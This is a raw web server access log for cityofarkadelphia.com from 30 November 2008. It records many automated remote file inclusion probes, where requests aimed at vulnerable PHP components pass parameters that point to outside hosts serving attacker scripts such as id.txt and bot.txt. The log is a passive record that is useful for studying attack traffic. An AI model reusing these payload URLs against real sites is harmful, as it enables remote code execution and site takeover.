94.229.68.13 - - [30/Nov/2008:18:13:17 -0800] "GET /logs//errors.php?error=www.linarie.com/alat/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:18:13:22 -0800] "GET /logs/access_080731.log/errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:18:13:22 -0800] "GET /errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:18:13:22 -0800] "GET /logs/errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
201.80.215.232 - - [30/Nov/2008:18:13:39 -0800] "GET /index.php?option=com_custompages&cpage=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
201.80.215.232 - - [30/Nov/2008:18:13:41 -0800] "GET /logs/access_080331.log/index.php?option=com_custompages&cpage=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:18:14:00 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:14:10 -0800] "GET /logs/access_080401.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:14:10 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:18:14:18 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:18:14:20 -0800] "GET /logs/access_080401.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:14:22 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:14:22 -0800] "GET /logs/access_080401.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:18:14:26 -0800] "GET /logs/access_080401.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:14:30 -0800] "GET /logs/access.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:14:39 -0800] "GET /logs/access.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:15:21 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:15:35 -0800] "GET /logs/access_080401.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:15:43 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:16:00 -0800] "GET /logs/access_080401.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.7.219.93 - - [30/Nov/2008:18:18:59 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.catstrand.co.uk/modules/request/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "cityofarkadelphia.com"
74.7.219.93 - - [30/Nov/2008:18:19:01 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.catstrand.co.uk/modules/request/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:20:18 -0800] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:20:21 -0800] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:18:20:32 -0800] "GET /index.php?body=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:18:20:32 -0800] "GET /logs/index.php?body=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:18:20:32 -0800] "GET /logs/access_080329.log/index.php?body=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:21:48 -0800] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:18:23:02 -0800] "GET /logs/access_080329.log%20%20/index.php?body=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:18:26:20 -0800] "GET /logs/access.log%20/components/com_forum/download.php?phpbb_root_path=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:18:26:20 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:18:26:23 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
206.225.82.192 - - [30/Nov/2008:18:26:54 -0800] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
206.225.82.192 - - [30/Nov/2008:18:26:54 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
206.225.82.192 - - [30/Nov/2008:18:26:55 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:18:28:51 -0800] "GET /logs/access_080731.log/errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:18:28:52 -0800] "GET /errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:18:28:52 -0800] "GET /logs/errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.221.254.1 - - [30/Nov/2008:18:29:08 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.15.54.41 - - [30/Nov/2008:18:29:55 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.zhepb.gov.cn/idfeel.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "cityofarkadelphia.com"
67.15.54.41 - - [30/Nov/2008:18:29:55 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.zhepb.gov.cn/idfeel.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "cityofarkadelphia.com"
67.15.54.41 - - [30/Nov/2008:18:29:56 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.zhepb.gov.cn/idfeel.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:18:30:13 -0800] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:18:30:13 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:18:30:13 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:18:31:48 -0800] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
121.125.79.167 - - [30/Nov/2008:18:31:55 -0800] "GET /logs/access_081031.log/lostpasswd.php?env[include_prefix]=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
121.125.79.167 - - [30/Nov/2008:18:31:55 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
121.125.79.167 - - [30/Nov/2008:18:31:56 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.202.35.13 - - [30/Nov/2008:18:35:02 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "cityofarkadelphia.com"
67.202.35.13 - - [30/Nov/2008:18:35:02 -0800] "GET /logs/access_080801.log HTTP/1.0" 200 516133 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "cityofarkadelphia.com"
212.48.105.6 - - [30/Nov/2008:18:35:27 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.duvase.com.ar/components/com_joomla/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "cityofarkadelphia.com"
212.48.105.6 - - [30/Nov/2008:18:35:27 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.duvase.com.ar/components/com_joomla/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "cityofarkadelphia.com"
206.225.82.192 - - [30/Nov/2008:18:36:28 -0800] "GET /logs/access_081031.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:36:48 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:36:49 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:36:49 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:18:37:04 -0800] "GET /logs/access_080731.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:18:37:05 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:18:37:05 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:18:37:06 -0800] "GET /logs/access_080201.log/index.php?body=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:37:15 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:37:16 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:37:16 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:38:16 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:38:17 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:38:17 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:38:48 -0800] "GET /logs/access_081031.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:39:32 -0800] "GET /logs/access_081031.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:40:18 -0800] "GET /logs/access_081031.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
213.193.220.6 - - [30/Nov/2008:18:41:27 -0800] "GET /site.php?meio=http://www.ipc-be.org/help01[1].txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
213.193.220.6 - - [30/Nov/2008:18:41:28 -0800] "GET /logs/site.php?meio=http://www.ipc-be.org/help01[1].txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
213.193.220.6 - - [30/Nov/2008:18:41:28 -0800] "GET /logs/access_080201.log/site.php?meio=http://www.ipc-be.org/help01[1].txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:18:46:33 -0800] "GET /logs/access_080731.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:18:46:33 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:18:46:34 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.61.54.26 - - [30/Nov/2008:18:47:10 -0800] "GET /bss/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.seanbatt.com/gallery/ee_commerce/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
69.61.54.26 - - [30/Nov/2008:18:47:10 -0800] "GET /logs/access.log/bss/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.seanbatt.com/gallery/ee_commerce/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
69.61.54.26 - - [30/Nov/2008:18:47:10 -0800] "GET /logs/bss/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.seanbatt.com/gallery/ee_commerce/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:18:48:12 -0800] "GET /logs/access_080901.log/errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:18:49:04 -0800] "GET /logs/access.log%20/components/com_forum/download.php?phpbb_root_path=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
190.3.25.99 - - [30/Nov/2008:18:56:15 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
190.3.25.99 - - [30/Nov/2008:18:56:15 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
190.3.25.99 - - [30/Nov/2008:18:56:15 -0800] "GET /lostpasswd.php?env[include_prefix]=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.221.254.1 - - [30/Nov/2008:18:58:14 -0800] "GET /logs/access_080901.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.221.254.1 - - [30/Nov/2008:18:58:15 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.221.254.1 - - [30/Nov/2008:18:58:15 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
203.215.243.76 - - [30/Nov/2008:19:01:22 -0800] "GET /logs/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://photo.jcc.idv.tw/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
203.215.243.76 - - [30/Nov/2008:19:01:22 -0800] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://photo.jcc.idv.tw/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.219.63.161 - - [30/Nov/2008:19:01:46 -0800] "GET /logs///vwar/backup/errors.php?error=http://pgeh.hs.kr/~meca/zb41pl4/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.219.63.161 - - [30/Nov/2008:19:01:46 -0800] "GET //vwar/backup/errors.php?error=http://pgeh.hs.kr/~meca/zb41pl4/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.219.63.161 - - [30/Nov/2008:19:01:46 -0800] "GET /logs/access_080329.log///vwar/backup/errors.php?error=http://pgeh.hs.kr/~meca/zb41pl4/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:19:02:24 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:19:02:24 -0800] "GET /?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:19:02:48 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:19:02:48 -0800] "GET /?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:19:03:11 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:19:03:11 -0800] "GET /?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:19:03:36 -0800] "GET /logs/access_080901.log/errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:19:04:54 -0800] "GET /logs/access_080901.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
201.159.66.178 - - [30/Nov/2008:19:11:06 -0800] "GET /lostpasswd.php?env[include_prefix]=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
201.159.66.178 - - [30/Nov/2008:19:11:09 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:19:11:15 -0800] "GET /logs/access_080901.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
201.159.66.178 - - [30/Nov/2008:19:11:26 -0800] "GET /logs/access_081031.log/lostpasswd.php?env[include_prefix]=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
75.125.207.2 - - [30/Nov/2008:19:11:45 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.enosi.org/html/v84.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
75.125.207.2 - - [30/Nov/2008:19:11:46 -0800] "GET /logs/access_080731.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.enosi.org/html/v84.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
75.125.207.2 - - [30/Nov/2008:19:11:46 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.enosi.org/html/v84.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
75.125.207.2 - - [30/Nov/2008:19:12:15 -0800] "GET /logs/access_080331.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.enosi.org/html/v84.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
219.85.63.226 - - [30/Nov/2008:19:12:58 -0800] "GET /logs/access_080731.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.enosi.org/html/v84.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
219.85.63.226 - - [30/Nov/2008:19:12:58 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.enosi.org/html/v84.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
219.85.63.226 - - [30/Nov/2008:19:13:00 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.enosi.org/html/v84.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
